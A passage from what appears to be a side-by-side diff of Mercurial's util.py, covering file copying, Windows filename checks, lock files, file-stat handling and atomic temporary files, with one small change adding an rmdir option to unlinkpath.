1649 srcname = os.path.join(src, name)
1650 dstname = os.path.join(dst, name)
1650 dstname = os.path.join(dst, name)
1651 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1651 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1652 num += n
1652 num += n
1653 else:
1653 else:
1654 if hardlink is None:
1654 if hardlink is None:
1655 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1655 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1656 os.stat(os.path.dirname(dst)).st_dev)
1656 os.stat(os.path.dirname(dst)).st_dev)
1657 settopic()
1657 settopic()
1658
1658
1659 if hardlink:
1659 if hardlink:
1660 try:
1660 try:
1661 oslink(src, dst)
1661 oslink(src, dst)
1662 except (IOError, OSError):
1662 except (IOError, OSError):
1663 hardlink = False
1663 hardlink = False
1664 shutil.copy(src, dst)
1664 shutil.copy(src, dst)
1665 else:
1665 else:
1666 shutil.copy(src, dst)
1666 shutil.copy(src, dst)
1667 num += 1
1667 num += 1
1668 if progress:
1668 if progress:
1669 progress.increment()
1669 progress.increment()
1670
1670
1671 return hardlink, num
1671 return hardlink, num
1672
1672
1673 _winreservednames = {
1673 _winreservednames = {
1674 'con', 'prn', 'aux', 'nul',
1674 'con', 'prn', 'aux', 'nul',
1675 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1675 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1676 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1676 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1677 }
1677 }
1678 _winreservedchars = ':*?"<>|'
1678 _winreservedchars = ':*?"<>|'
1679 def checkwinfilename(path):
1679 def checkwinfilename(path):
1680 r'''Check that the base-relative path is a valid filename on Windows.
1680 r'''Check that the base-relative path is a valid filename on Windows.
1681 Returns None if the path is ok, or a UI string describing the problem.
1681 Returns None if the path is ok, or a UI string describing the problem.
1682
1682
1683 >>> checkwinfilename(b"just/a/normal/path")
1683 >>> checkwinfilename(b"just/a/normal/path")
1684 >>> checkwinfilename(b"foo/bar/con.xml")
1684 >>> checkwinfilename(b"foo/bar/con.xml")
1685 "filename contains 'con', which is reserved on Windows"
1685 "filename contains 'con', which is reserved on Windows"
1686 >>> checkwinfilename(b"foo/con.xml/bar")
1686 >>> checkwinfilename(b"foo/con.xml/bar")
1687 "filename contains 'con', which is reserved on Windows"
1687 "filename contains 'con', which is reserved on Windows"
1688 >>> checkwinfilename(b"foo/bar/xml.con")
1688 >>> checkwinfilename(b"foo/bar/xml.con")
1689 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1689 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1690 "filename contains 'AUX', which is reserved on Windows"
1690 "filename contains 'AUX', which is reserved on Windows"
1691 >>> checkwinfilename(b"foo/bar/bla:.txt")
1691 >>> checkwinfilename(b"foo/bar/bla:.txt")
1692 "filename contains ':', which is reserved on Windows"
1692 "filename contains ':', which is reserved on Windows"
1693 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1693 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1694 "filename contains '\\x07', which is invalid on Windows"
1694 "filename contains '\\x07', which is invalid on Windows"
1695 >>> checkwinfilename(b"foo/bar/bla ")
1695 >>> checkwinfilename(b"foo/bar/bla ")
1696 "filename ends with ' ', which is not allowed on Windows"
1696 "filename ends with ' ', which is not allowed on Windows"
1697 >>> checkwinfilename(b"../bar")
1697 >>> checkwinfilename(b"../bar")
1698 >>> checkwinfilename(b"foo\\")
1698 >>> checkwinfilename(b"foo\\")
1699 "filename ends with '\\', which is invalid on Windows"
1699 "filename ends with '\\', which is invalid on Windows"
1700 >>> checkwinfilename(b"foo\\/bar")
1700 >>> checkwinfilename(b"foo\\/bar")
1701 "directory name ends with '\\', which is invalid on Windows"
1701 "directory name ends with '\\', which is invalid on Windows"
1702 '''
1702 '''
1703 if path.endswith('\\'):
1703 if path.endswith('\\'):
1704 return _("filename ends with '\\', which is invalid on Windows")
1704 return _("filename ends with '\\', which is invalid on Windows")
1705 if '\\/' in path:
1705 if '\\/' in path:
1706 return _("directory name ends with '\\', which is invalid on Windows")
1706 return _("directory name ends with '\\', which is invalid on Windows")
1707 for n in path.replace('\\', '/').split('/'):
1707 for n in path.replace('\\', '/').split('/'):
1708 if not n:
1708 if not n:
1709 continue
1709 continue
1710 for c in _filenamebytestr(n):
1710 for c in _filenamebytestr(n):
1711 if c in _winreservedchars:
1711 if c in _winreservedchars:
1712 return _("filename contains '%s', which is reserved "
1712 return _("filename contains '%s', which is reserved "
1713 "on Windows") % c
1713 "on Windows") % c
1714 if ord(c) <= 31:
1714 if ord(c) <= 31:
1715 return _("filename contains '%s', which is invalid "
1715 return _("filename contains '%s', which is invalid "
1716 "on Windows") % stringutil.escapestr(c)
1716 "on Windows") % stringutil.escapestr(c)
1717 base = n.split('.')[0]
1717 base = n.split('.')[0]
1718 if base and base.lower() in _winreservednames:
1718 if base and base.lower() in _winreservednames:
1719 return _("filename contains '%s', which is reserved "
1719 return _("filename contains '%s', which is reserved "
1720 "on Windows") % base
1720 "on Windows") % base
1721 t = n[-1:]
1721 t = n[-1:]
1722 if t in '. ' and n not in '..':
1722 if t in '. ' and n not in '..':
1723 return _("filename ends with '%s', which is not allowed "
1723 return _("filename ends with '%s', which is not allowed "
1724 "on Windows") % t
1724 "on Windows") % t
1725
1725
1726 if pycompat.iswindows:
1726 if pycompat.iswindows:
1727 checkosfilename = checkwinfilename
1727 checkosfilename = checkwinfilename
1728 timer = time.clock
1728 timer = time.clock
1729 else:
1729 else:
1730 checkosfilename = platform.checkosfilename
1730 checkosfilename = platform.checkosfilename
1731 timer = time.time
1731 timer = time.time
1732
1732
1733 if safehasattr(time, "perf_counter"):
1733 if safehasattr(time, "perf_counter"):
1734 timer = time.perf_counter
1734 timer = time.perf_counter
1735
1735
1736 def makelock(info, pathname):
1736 def makelock(info, pathname):
1737 """Create a lock file atomically if possible
1737 """Create a lock file atomically if possible
1738
1738
1739 This may leave a stale lock file if symlink isn't supported and signal
1739 This may leave a stale lock file if symlink isn't supported and signal
1740 interrupt is enabled.
1740 interrupt is enabled.
1741 """
1741 """
1742 try:
1742 try:
1743 return os.symlink(info, pathname)
1743 return os.symlink(info, pathname)
1744 except OSError as why:
1744 except OSError as why:
1745 if why.errno == errno.EEXIST:
1745 if why.errno == errno.EEXIST:
1746 raise
1746 raise
1747 except AttributeError: # no symlink in os
1747 except AttributeError: # no symlink in os
1748 pass
1748 pass
1749
1749
1750 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1750 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1751 ld = os.open(pathname, flags)
1751 ld = os.open(pathname, flags)
1752 os.write(ld, info)
1752 os.write(ld, info)
1753 os.close(ld)
1753 os.close(ld)
1754
1754
1755 def readlock(pathname):
1755 def readlock(pathname):
1756 try:
1756 try:
1757 return os.readlink(pathname)
1757 return os.readlink(pathname)
1758 except OSError as why:
1758 except OSError as why:
1759 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1759 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1760 raise
1760 raise
1761 except AttributeError: # no symlink in os
1761 except AttributeError: # no symlink in os
1762 pass
1762 pass
1763 fp = posixfile(pathname, 'rb')
1763 fp = posixfile(pathname, 'rb')
1764 r = fp.read()
1764 r = fp.read()
1765 fp.close()
1765 fp.close()
1766 return r
1766 return r
1767
1767
1768 def fstat(fp):
1768 def fstat(fp):
1769 '''stat file object that may not have fileno method.'''
1769 '''stat file object that may not have fileno method.'''
1770 try:
1770 try:
1771 return os.fstat(fp.fileno())
1771 return os.fstat(fp.fileno())
1772 except AttributeError:
1772 except AttributeError:
1773 return os.stat(fp.name)
1773 return os.stat(fp.name)
1774
1774
1775 # File system features
1775 # File system features
1776
1776
1777 def fscasesensitive(path):
1777 def fscasesensitive(path):
1778 """
1778 """
1779 Return true if the given path is on a case-sensitive filesystem
1779 Return true if the given path is on a case-sensitive filesystem
1780
1780
1781 Requires a path (like /foo/.hg) ending with a foldable final
1781 Requires a path (like /foo/.hg) ending with a foldable final
1782 directory component.
1782 directory component.
1783 """
1783 """
1784 s1 = os.lstat(path)
1784 s1 = os.lstat(path)
1785 d, b = os.path.split(path)
1785 d, b = os.path.split(path)
1786 b2 = b.upper()
1786 b2 = b.upper()
1787 if b == b2:
1787 if b == b2:
1788 b2 = b.lower()
1788 b2 = b.lower()
1789 if b == b2:
1789 if b == b2:
1790 return True # no evidence against case sensitivity
1790 return True # no evidence against case sensitivity
1791 p2 = os.path.join(d, b2)
1791 p2 = os.path.join(d, b2)
1792 try:
1792 try:
1793 s2 = os.lstat(p2)
1793 s2 = os.lstat(p2)
1794 if s2 == s1:
1794 if s2 == s1:
1795 return False
1795 return False
1796 return True
1796 return True
1797 except OSError:
1797 except OSError:
1798 return True
1798 return True
1799
1799
1800 try:
1800 try:
1801 import re2
1801 import re2
1802 _re2 = None
1802 _re2 = None
1803 except ImportError:
1803 except ImportError:
1804 _re2 = False
1804 _re2 = False
1805
1805
1806 class _re(object):
1806 class _re(object):
1807 def _checkre2(self):
1807 def _checkre2(self):
1808 global _re2
1808 global _re2
1809 try:
1809 try:
1810 # check if match works, see issue3964
1810 # check if match works, see issue3964
1811 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1811 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1812 except ImportError:
1812 except ImportError:
1813 _re2 = False
1813 _re2 = False
1814
1814
1815 def compile(self, pat, flags=0):
1815 def compile(self, pat, flags=0):
1816 '''Compile a regular expression, using re2 if possible
1816 '''Compile a regular expression, using re2 if possible
1817
1817
1818 For best performance, use only re2-compatible regexp features. The
1818 For best performance, use only re2-compatible regexp features. The
1819 only flags from the re module that are re2-compatible are
1819 only flags from the re module that are re2-compatible are
1820 IGNORECASE and MULTILINE.'''
1820 IGNORECASE and MULTILINE.'''
1821 if _re2 is None:
1821 if _re2 is None:
1822 self._checkre2()
1822 self._checkre2()
1823 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1823 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1824 if flags & remod.IGNORECASE:
1824 if flags & remod.IGNORECASE:
1825 pat = '(?i)' + pat
1825 pat = '(?i)' + pat
1826 if flags & remod.MULTILINE:
1826 if flags & remod.MULTILINE:
1827 pat = '(?m)' + pat
1827 pat = '(?m)' + pat
1828 try:
1828 try:
1829 return re2.compile(pat)
1829 return re2.compile(pat)
1830 except re2.error:
1830 except re2.error:
1831 pass
1831 pass
1832 return remod.compile(pat, flags)
1832 return remod.compile(pat, flags)
1833
1833
1834 @propertycache
1834 @propertycache
1835 def escape(self):
1835 def escape(self):
1836 '''Return the version of escape corresponding to self.compile.
1836 '''Return the version of escape corresponding to self.compile.
1837
1837
1838 This is imperfect because whether re2 or re is used for a particular
1838 This is imperfect because whether re2 or re is used for a particular
1839 function depends on the flags, etc, but it's the best we can do.
1839 function depends on the flags, etc, but it's the best we can do.
1840 '''
1840 '''
1841 global _re2
1841 global _re2
1842 if _re2 is None:
1842 if _re2 is None:
1843 self._checkre2()
1843 self._checkre2()
1844 if _re2:
1844 if _re2:
1845 return re2.escape
1845 return re2.escape
1846 else:
1846 else:
1847 return remod.escape
1847 return remod.escape
1848
1848
1849 re = _re()
1849 re = _re()
1850
1850
1851 _fspathcache = {}
1851 _fspathcache = {}
1852 def fspath(name, root):
1852 def fspath(name, root):
1853 '''Get name in the case stored in the filesystem
1853 '''Get name in the case stored in the filesystem
1854
1854
1855 The name should be relative to root, and be normcase-ed for efficiency.
1855 The name should be relative to root, and be normcase-ed for efficiency.
1856
1856
1857 Note that this function is unnecessary, and should not be
1857 Note that this function is unnecessary, and should not be
1858 called, for case-sensitive filesystems (simply because it's expensive).
1858 called, for case-sensitive filesystems (simply because it's expensive).
1859
1859
1860 The root should be normcase-ed, too.
1860 The root should be normcase-ed, too.
1861 '''
1861 '''
1862 def _makefspathcacheentry(dir):
1862 def _makefspathcacheentry(dir):
1863 return dict((normcase(n), n) for n in os.listdir(dir))
1863 return dict((normcase(n), n) for n in os.listdir(dir))
1864
1864
1865 seps = pycompat.ossep
1865 seps = pycompat.ossep
1866 if pycompat.osaltsep:
1866 if pycompat.osaltsep:
1867 seps = seps + pycompat.osaltsep
1867 seps = seps + pycompat.osaltsep
1868 # Protect backslashes. This gets silly very quickly.
1868 # Protect backslashes. This gets silly very quickly.
1869 seps.replace('\\','\\\\')
1869 seps.replace('\\','\\\\')
1870 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1870 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1871 dir = os.path.normpath(root)
1871 dir = os.path.normpath(root)
1872 result = []
1872 result = []
1873 for part, sep in pattern.findall(name):
1873 for part, sep in pattern.findall(name):
1874 if sep:
1874 if sep:
1875 result.append(sep)
1875 result.append(sep)
1876 continue
1876 continue
1877
1877
1878 if dir not in _fspathcache:
1878 if dir not in _fspathcache:
1879 _fspathcache[dir] = _makefspathcacheentry(dir)
1879 _fspathcache[dir] = _makefspathcacheentry(dir)
1880 contents = _fspathcache[dir]
1880 contents = _fspathcache[dir]
1881
1881
1882 found = contents.get(part)
1882 found = contents.get(part)
1883 if not found:
1883 if not found:
1884 # retry "once per directory" per "dirstate.walk" which
1884 # retry "once per directory" per "dirstate.walk" which
1885 # may take place for each patches of "hg qpush", for example
1885 # may take place for each patches of "hg qpush", for example
1886 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1886 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1887 found = contents.get(part)
1887 found = contents.get(part)
1888
1888
1889 result.append(found or part)
1889 result.append(found or part)
1890 dir = os.path.join(dir, part)
1890 dir = os.path.join(dir, part)
1891
1891
1892 return ''.join(result)
1892 return ''.join(result)
1893
1893
1894 def checknlink(testfile):
1894 def checknlink(testfile):
1895 '''check whether hardlink count reporting works properly'''
1895 '''check whether hardlink count reporting works properly'''
1896
1896
1897 # testfile may be open, so we need a separate file for checking to
1897 # testfile may be open, so we need a separate file for checking to
1898 # work around issue2543 (or testfile may get lost on Samba shares)
1898 # work around issue2543 (or testfile may get lost on Samba shares)
1899 f1, f2, fp = None, None, None
1899 f1, f2, fp = None, None, None
1900 try:
1900 try:
1901 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1901 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1902 suffix='1~', dir=os.path.dirname(testfile))
1902 suffix='1~', dir=os.path.dirname(testfile))
1903 os.close(fd)
1903 os.close(fd)
1904 f2 = '%s2~' % f1[:-2]
1904 f2 = '%s2~' % f1[:-2]
1905
1905
1906 oslink(f1, f2)
1906 oslink(f1, f2)
1907 # nlinks() may behave differently for files on Windows shares if
1907 # nlinks() may behave differently for files on Windows shares if
1908 # the file is open.
1908 # the file is open.
1909 fp = posixfile(f2)
1909 fp = posixfile(f2)
1910 return nlinks(f2) > 1
1910 return nlinks(f2) > 1
1911 except OSError:
1911 except OSError:
1912 return False
1912 return False
1913 finally:
1913 finally:
1914 if fp is not None:
1914 if fp is not None:
1915 fp.close()
1915 fp.close()
1916 for f in (f1, f2):
1916 for f in (f1, f2):
1917 try:
1917 try:
1918 if f is not None:
1918 if f is not None:
1919 os.unlink(f)
1919 os.unlink(f)
1920 except OSError:
1920 except OSError:
1921 pass
1921 pass
1922
1922
1923 def endswithsep(path):
1923 def endswithsep(path):
1924 '''Check path ends with os.sep or os.altsep.'''
1924 '''Check path ends with os.sep or os.altsep.'''
1925 return (path.endswith(pycompat.ossep)
1925 return (path.endswith(pycompat.ossep)
1926 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1926 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1927
1927
1928 def splitpath(path):
1928 def splitpath(path):
1929 '''Split path by os.sep.
1929 '''Split path by os.sep.
1930 Note that this function does not use os.altsep because this is
1930 Note that this function does not use os.altsep because this is
1931 an alternative of simple "xxx.split(os.sep)".
1931 an alternative of simple "xxx.split(os.sep)".
1932 It is recommended to use os.path.normpath() before using this
1932 It is recommended to use os.path.normpath() before using this
1933 function if need.'''
1933 function if need.'''
1934 return path.split(pycompat.ossep)
1934 return path.split(pycompat.ossep)
1935
1935
1936 def mktempcopy(name, emptyok=False, createmode=None):
1936 def mktempcopy(name, emptyok=False, createmode=None):
1937 """Create a temporary file with the same contents from name
1937 """Create a temporary file with the same contents from name
1938
1938
1939 The permission bits are copied from the original file.
1939 The permission bits are copied from the original file.
1940
1940
1941 If the temporary file is going to be truncated immediately, you
1941 If the temporary file is going to be truncated immediately, you
1942 can use emptyok=True as an optimization.
1942 can use emptyok=True as an optimization.
1943
1943
1944 Returns the name of the temporary file.
1944 Returns the name of the temporary file.
1945 """
1945 """
1946 d, fn = os.path.split(name)
1946 d, fn = os.path.split(name)
1947 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1947 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1948 os.close(fd)
1948 os.close(fd)
1949 # Temporary files are created with mode 0600, which is usually not
1949 # Temporary files are created with mode 0600, which is usually not
1950 # what we want. If the original file already exists, just copy
1950 # what we want. If the original file already exists, just copy
1951 # its mode. Otherwise, manually obey umask.
1951 # its mode. Otherwise, manually obey umask.
1952 copymode(name, temp, createmode)
1952 copymode(name, temp, createmode)
1953 if emptyok:
1953 if emptyok:
1954 return temp
1954 return temp
1955 try:
1955 try:
1956 try:
1956 try:
1957 ifp = posixfile(name, "rb")
1957 ifp = posixfile(name, "rb")
1958 except IOError as inst:
1958 except IOError as inst:
1959 if inst.errno == errno.ENOENT:
1959 if inst.errno == errno.ENOENT:
1960 return temp
1960 return temp
1961 if not getattr(inst, 'filename', None):
1961 if not getattr(inst, 'filename', None):
1962 inst.filename = name
1962 inst.filename = name
1963 raise
1963 raise
1964 ofp = posixfile(temp, "wb")
1964 ofp = posixfile(temp, "wb")
1965 for chunk in filechunkiter(ifp):
1965 for chunk in filechunkiter(ifp):
1966 ofp.write(chunk)
1966 ofp.write(chunk)
1967 ifp.close()
1967 ifp.close()
1968 ofp.close()
1968 ofp.close()
1969 except: # re-raises
1969 except: # re-raises
1970 try:
1970 try:
1971 os.unlink(temp)
1971 os.unlink(temp)
1972 except OSError:
1972 except OSError:
1973 pass
1973 pass
1974 raise
1974 raise
1975 return temp
1975 return temp
1976
1976
1977 class filestat(object):
1977 class filestat(object):
1978 """help to exactly detect change of a file
1978 """help to exactly detect change of a file
1979
1979
1980 'stat' attribute is result of 'os.stat()' if specified 'path'
1980 'stat' attribute is result of 'os.stat()' if specified 'path'
1981 exists. Otherwise, it is None. This can avoid preparative
1981 exists. Otherwise, it is None. This can avoid preparative
1982 'exists()' examination on client side of this class.
1982 'exists()' examination on client side of this class.
1983 """
1983 """
1984 def __init__(self, stat):
1984 def __init__(self, stat):
1985 self.stat = stat
1985 self.stat = stat
1986
1986
1987 @classmethod
1987 @classmethod
1988 def frompath(cls, path):
1988 def frompath(cls, path):
1989 try:
1989 try:
1990 stat = os.stat(path)
1990 stat = os.stat(path)
1991 except OSError as err:
1991 except OSError as err:
1992 if err.errno != errno.ENOENT:
1992 if err.errno != errno.ENOENT:
1993 raise
1993 raise
1994 stat = None
1994 stat = None
1995 return cls(stat)
1995 return cls(stat)
1996
1996
1997 @classmethod
1997 @classmethod
1998 def fromfp(cls, fp):
1998 def fromfp(cls, fp):
1999 stat = os.fstat(fp.fileno())
1999 stat = os.fstat(fp.fileno())
2000 return cls(stat)
2000 return cls(stat)
2001
2001
2002 __hash__ = object.__hash__
2002 __hash__ = object.__hash__
2003
2003
2004 def __eq__(self, old):
2004 def __eq__(self, old):
2005 try:
2005 try:
2006 # if ambiguity between stat of new and old file is
2006 # if ambiguity between stat of new and old file is
2007 # avoided, comparison of size, ctime and mtime is enough
2007 # avoided, comparison of size, ctime and mtime is enough
2008 # to exactly detect change of a file regardless of platform
2008 # to exactly detect change of a file regardless of platform
2009 return (self.stat.st_size == old.stat.st_size and
2009 return (self.stat.st_size == old.stat.st_size and
2010 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2010 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
2011 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2011 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
2012 except AttributeError:
2012 except AttributeError:
2013 pass
2013 pass
2014 try:
2014 try:
2015 return self.stat is None and old.stat is None
2015 return self.stat is None and old.stat is None
2016 except AttributeError:
2016 except AttributeError:
2017 return False
2017 return False
2018
2018
2019 def isambig(self, old):
2019 def isambig(self, old):
2020 """Examine whether new (= self) stat is ambiguous against old one
2020 """Examine whether new (= self) stat is ambiguous against old one
2021
2021
2022 "S[N]" below means stat of a file at N-th change:
2022 "S[N]" below means stat of a file at N-th change:
2023
2023
2024 - S[n-1].ctime < S[n].ctime: can detect change of a file
2024 - S[n-1].ctime < S[n].ctime: can detect change of a file
2025 - S[n-1].ctime == S[n].ctime
2025 - S[n-1].ctime == S[n].ctime
2026 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2026 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2027 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2027 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2028 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2028 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2029 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2029 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2030
2030
2031 Case (*2) above means that a file was changed twice or more at
2031 Case (*2) above means that a file was changed twice or more at
2032 same time in sec (= S[n-1].ctime), and comparison of timestamp
2032 same time in sec (= S[n-1].ctime), and comparison of timestamp
2033 is ambiguous.
2033 is ambiguous.
2034
2034
2035 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2035 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2036 timestamp is ambiguous".
2036 timestamp is ambiguous".
2037
2037
2038 But advancing mtime only in case (*2) doesn't work as
2038 But advancing mtime only in case (*2) doesn't work as
2039 expected, because naturally advanced S[n].mtime in case (*1)
2039 expected, because naturally advanced S[n].mtime in case (*1)
2040 might be equal to manually advanced S[n-1 or earlier].mtime.
2040 might be equal to manually advanced S[n-1 or earlier].mtime.
2041
2041
2042 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2042 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2043 treated as ambiguous regardless of mtime, to avoid overlooking
2043 treated as ambiguous regardless of mtime, to avoid overlooking
2044 by confliction between such mtime.
2044 by confliction between such mtime.
2045
2045
2046 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2046 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2047 S[n].mtime", even if size of a file isn't changed.
2047 S[n].mtime", even if size of a file isn't changed.
2048 """
2048 """
2049 try:
2049 try:
2050 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2050 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2051 except AttributeError:
2051 except AttributeError:
2052 return False
2052 return False
2053
2053
2054 def avoidambig(self, path, old):
2054 def avoidambig(self, path, old):
2055 """Change file stat of specified path to avoid ambiguity
2055 """Change file stat of specified path to avoid ambiguity
2056
2056
2057 'old' should be previous filestat of 'path'.
2057 'old' should be previous filestat of 'path'.
2058
2058
2059 This skips avoiding ambiguity, if a process doesn't have
2059 This skips avoiding ambiguity, if a process doesn't have
2060 appropriate privileges for 'path'. This returns False in this
2060 appropriate privileges for 'path'. This returns False in this
2061 case.
2061 case.
2062
2062
2063 Otherwise, this returns True, as "ambiguity is avoided".
2063 Otherwise, this returns True, as "ambiguity is avoided".
2064 """
2064 """
2065 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2065 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2066 try:
2066 try:
2067 os.utime(path, (advanced, advanced))
2067 os.utime(path, (advanced, advanced))
2068 except OSError as inst:
2068 except OSError as inst:
2069 if inst.errno == errno.EPERM:
2069 if inst.errno == errno.EPERM:
2070 # utime() on the file created by another user causes EPERM,
2070 # utime() on the file created by another user causes EPERM,
2071 # if a process doesn't have appropriate privileges
2071 # if a process doesn't have appropriate privileges
2072 return False
2072 return False
2073 raise
2073 raise
2074 return True
2074 return True
2075
2075
2076 def __ne__(self, other):
2076 def __ne__(self, other):
2077 return not self == other
2077 return not self == other
2078
2078
2079 class atomictempfile(object):
2079 class atomictempfile(object):
2080 '''writable file object that atomically updates a file
2080 '''writable file object that atomically updates a file
2081
2081
2082 All writes will go to a temporary copy of the original file. Call
2082 All writes will go to a temporary copy of the original file. Call
2083 close() when you are done writing, and atomictempfile will rename
2083 close() when you are done writing, and atomictempfile will rename
2084 the temporary copy to the original name, making the changes
2084 the temporary copy to the original name, making the changes
2085 visible. If the object is destroyed without being closed, all your
2085 visible. If the object is destroyed without being closed, all your
2086 writes are discarded.
2086 writes are discarded.
2087
2087
2088 checkambig argument of constructor is used with filestat, and is
2088 checkambig argument of constructor is used with filestat, and is
2089 useful only if target file is guarded by any lock (e.g. repo.lock
2089 useful only if target file is guarded by any lock (e.g. repo.lock
2090 or repo.wlock).
2090 or repo.wlock).
2091 '''
2091 '''
2092 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2092 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2093 self.__name = name # permanent name
2093 self.__name = name # permanent name
2094 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2094 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2095 createmode=createmode)
2095 createmode=createmode)
2096 self._fp = posixfile(self._tempname, mode)
2096 self._fp = posixfile(self._tempname, mode)
2097 self._checkambig = checkambig
2097 self._checkambig = checkambig
2098
2098
2099 # delegated methods
2099 # delegated methods
2100 self.read = self._fp.read
2100 self.read = self._fp.read
2101 self.write = self._fp.write
2101 self.write = self._fp.write
2102 self.seek = self._fp.seek
2102 self.seek = self._fp.seek
2103 self.tell = self._fp.tell
2103 self.tell = self._fp.tell
2104 self.fileno = self._fp.fileno
2104 self.fileno = self._fp.fileno
2105
2105
2106 def close(self):
2106 def close(self):
2107 if not self._fp.closed:
2107 if not self._fp.closed:
2108 self._fp.close()
2108 self._fp.close()
2109 filename = localpath(self.__name)
2109 filename = localpath(self.__name)
2110 oldstat = self._checkambig and filestat.frompath(filename)
2110 oldstat = self._checkambig and filestat.frompath(filename)
2111 if oldstat and oldstat.stat:
2111 if oldstat and oldstat.stat:
2112 rename(self._tempname, filename)
2112 rename(self._tempname, filename)
2113 newstat = filestat.frompath(filename)
2113 newstat = filestat.frompath(filename)
2114 if newstat.isambig(oldstat):
2114 if newstat.isambig(oldstat):
2115 # stat of changed file is ambiguous to original one
2115 # stat of changed file is ambiguous to original one
2116 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2116 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2117 os.utime(filename, (advanced, advanced))
2117 os.utime(filename, (advanced, advanced))
2118 else:
2118 else:
2119 rename(self._tempname, filename)
2119 rename(self._tempname, filename)
2120
2120
2121 def discard(self):
2121 def discard(self):
2122 if not self._fp.closed:
2122 if not self._fp.closed:
2123 try:
2123 try:
2124 os.unlink(self._tempname)
2124 os.unlink(self._tempname)
2125 except OSError:
2125 except OSError:
2126 pass
2126 pass
2127 self._fp.close()
2127 self._fp.close()
2128
2128
2129 def __del__(self):
2129 def __del__(self):
2130 if safehasattr(self, '_fp'): # constructor actually did something
2130 if safehasattr(self, '_fp'): # constructor actually did something
2131 self.discard()
2131 self.discard()
2132
2132
2133 def __enter__(self):
2133 def __enter__(self):
2134 return self
2134 return self
2135
2135
2136 def __exit__(self, exctype, excvalue, traceback):
2136 def __exit__(self, exctype, excvalue, traceback):
2137 if exctype is not None:
2137 if exctype is not None:
2138 self.discard()
2138 self.discard()
2139 else:
2139 else:
2140 self.close()
2140 self.close()
2141
2141
2142 def unlinkpath(f, ignoremissing=False):
2142 def unlinkpath(f, ignoremissing=False, rmdir=True):
2143 """unlink and remove the directory if it is empty"""
2143 """unlink and remove the directory if it is empty"""
2144 if ignoremissing:
2144 if ignoremissing:
2145 tryunlink(f)
2145 tryunlink(f)
2146 else:
2146 else:
2147 unlink(f)
2147 unlink(f)
2148 # try removing directories that might now be empty
2148 if rmdir:
2149 try:
2149 # try removing directories that might now be empty
2150 removedirs(os.path.dirname(f))
2150 try:
2151 except OSError:
2151 removedirs(os.path.dirname(f))
2152 pass
2152 except OSError:
2153 pass
2153
2154
2154 def tryunlink(f):
2155 def tryunlink(f):
2155 """Attempt to remove a file, ignoring ENOENT errors."""
2156 """Attempt to remove a file, ignoring ENOENT errors."""
2156 try:
2157 try:
2157 unlink(f)
2158 unlink(f)
2158 except OSError as e:
2159 except OSError as e:
2159 if e.errno != errno.ENOENT:
2160 if e.errno != errno.ENOENT:
2160 raise
2161 raise
2161
2162
2162 def makedirs(name, mode=None, notindexed=False):
2163 def makedirs(name, mode=None, notindexed=False):
2163 """recursive directory creation with parent mode inheritance
